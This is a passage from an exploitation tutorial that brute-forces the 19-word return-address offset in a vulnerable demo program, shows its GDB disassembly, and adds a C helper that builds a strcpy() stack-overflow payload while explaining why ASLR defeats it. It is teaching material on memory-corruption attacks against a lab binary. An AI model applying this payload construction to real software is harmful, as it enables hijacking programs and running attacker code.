Trying offset of 13 words
buffer is at 0xbfe0fd80
Trying offset of 14 words
buffer is at 0xbfe03d70
Trying offset of 15 words
buffer is at 0xbfc2fb90
Trying offset of 16 words
buffer is at 0xbff32a40
Trying offset of 17 words
buffer is at 0xbf9da940
Trying offset of 18 words
buffer is at 0xbfd0cc70
Trying offset of 19 words
buffer is at 0xbf897ff0
Illegal instruction
==> Correct offset to return address is 19 words
reader@hacking:~/booksrc $
Knowing the proper offset will let us overwrite the return address. The
disassembly below confirms the brute-forced value: the buffer starts at
ebp-72, so the saved return address at ebp+4 lies 76 bytes, or 19 words,
past the start of the buffer. However, we still cannot execute shellcode,
since the stack, and with it the buffer the shellcode would sit in, is at a
different address on every run (compare the buffer addresses printed
above). Using GDB, let's look at the program just as it's about to return
from the main function.
reader@hacking:~/booksrc $ gdb -q ./aslr_demo
Using host libthread_db library "/lib/tls/i686/cmov/libthread_db.so.1".
(gdb) disass main
Dump of assembler code for function main:
0x080483b4 <main+0>: push ebp
0x080483b5 <main+1>: mov ebp,esp
0x080483b7 <main+3>: sub esp,0x58
0x080483ba <main+6>: and esp,0xfffffff0
0x080483bd <main+9>: mov eax,0x0
0x080483c2 <main+14>: sub esp,eax
0x080483c4 <main+16>: lea eax,[ebp-72]
0x080483c7 <main+19>: mov DWORD PTR [esp+4],eax
0x080483cb <main+23>: mov DWORD PTR [esp],0x80484d4
0x080483d2 <main+30>: call 0x80482d4 <printf@plt>
0x080483d7 <main+35>: cmp DWORD PTR [ebp+8],0x1
0x080483db <main+39>: jle 0x80483f4 <main+64>
0x080483dd <main+41>: mov eax,DWORD PTR [ebp+12]
0x080483e0 <main+44>: add eax,0x4
0x080483e3 <main+47>: mov eax,DWORD PTR [eax]
0x080483e5 <main+49>: mov DWORD PTR [esp+4],eax
0x080483e9 <main+53>: lea eax,[ebp-72]
0x080483ec <main+56>: mov DWORD PTR [esp],eax
0x080483ef <main+59>: call 0x80482c4 <strcpy@plt>
0x080483f4 <main+64>: mov eax,0x1
0x080483f9 <main+69>: leave
0x080483fa <main+70>: ret
End of assembler dump.
(gdb) break *0x080483fa
Breakpoint 1 at 0x80483fa: file aslr_demo.c, line 12.
(gdb)
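The following is an added example, not code from the book: it turns the two facts established above (the buffer at ebp-72 from the disassembly, and the brute-forced 19-word offset) into a small payload builder for the strcpy() overflow in aslr_demo. The frame-layout arithmetic, the "buffer is at 0x..." parser and build_payload() are my own helpers; the sample leak line is constructed from the last line of the brute-force output. The NUL-byte check is the caveat a practitioner wants here: strcpy() stops at the first zero byte, so a return address containing one cannot be written this way.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Offset (in 4-byte words) from the start of a stack buffer to the saved
 * return address, for a 32-bit x86 frame laid out as
 *     [ebp - buf_off]  buffer
 *     [ebp]            saved ebp
 *     [ebp + 4]        return address
 * For aslr_demo's "lea eax,[ebp-72]" this is (72 + 4) / 4 = 19 words,
 * matching the offset found by brute force above. */
size_t ret_offset_words(size_t buf_off_from_ebp)
{
    return (buf_off_from_ebp + 4) / 4;
}

/* Parse the address out of a "buffer is at 0x..." line printed by the target.
 * Returns 1 on success, 0 if the line is not in that format. */
int parse_buffer_addr(const char *line, uint32_t *addr)
{
    unsigned int v;
    if (sscanf(line, "buffer is at 0x%x", &v) != 1)
        return 0;
    *addr = (uint32_t)v;
    return 1;
}

/* Build the strcpy() overflow string: offset_words words of filler followed
 * by ret_addr in little-endian byte order, NUL-terminated.  Returns the
 * payload length, or 0 if it does not fit in out or if ret_addr contains a
 * NUL byte (strcpy() would stop copying there and truncate the overwrite). */
size_t build_payload(size_t offset_words, uint32_t ret_addr,
                     unsigned char *out, size_t out_len)
{
    size_t pad = offset_words * 4;
    if (pad + 4 + 1 > out_len)
        return 0;
    for (int i = 0; i < 4; i++)
        if (((ret_addr >> (8 * i)) & 0xff) == 0)
            return 0;
    memset(out, 'A', pad);
    for (int i = 0; i < 4; i++)
        out[pad + i] = (unsigned char)((ret_addr >> (8 * i)) & 0xff);
    out[pad + 4] = '\0';
    return pad + 4;
}

int main(void)
{
    /* Constructed sample: the last leak line from the brute-force run. */
    const char *leak = "buffer is at 0xbf897ff0";
    uint32_t addr = 0;
    unsigned char payload[128];

    size_t words = ret_offset_words(72);
    printf("return address is %zu words past the buffer\n", words);

    if (parse_buffer_addr(leak, &addr))
        printf("leaked buffer address: 0x%08x\n", addr);

    /* Under ASLR this address is only valid for the run that printed it, and
     * argv is fixed before that run prints anything, so the leak cannot be
     * fed back into the same process.  This is exactly why the offset alone
     * is not enough to land in shellcode placed in the buffer. */
    size_t n = build_payload(words, addr, payload, sizeof payload);
    if (n)
        printf("payload: %zu bytes, last four %02x %02x %02x %02x\n",
               n, payload[n - 4], payload[n - 3], payload[n - 2], payload[n - 1]);
    return 0;
}
```

The payload for the 19-word offset is 80 bytes: 76 filler bytes followed by the four address bytes in little-endian order, which is the string you would pass as argv[1] to aslr_demo. Using the leaked buffer address as the target is shown only to make the ASLR problem concrete; the next step in the text is to find a return target that does not move between runs.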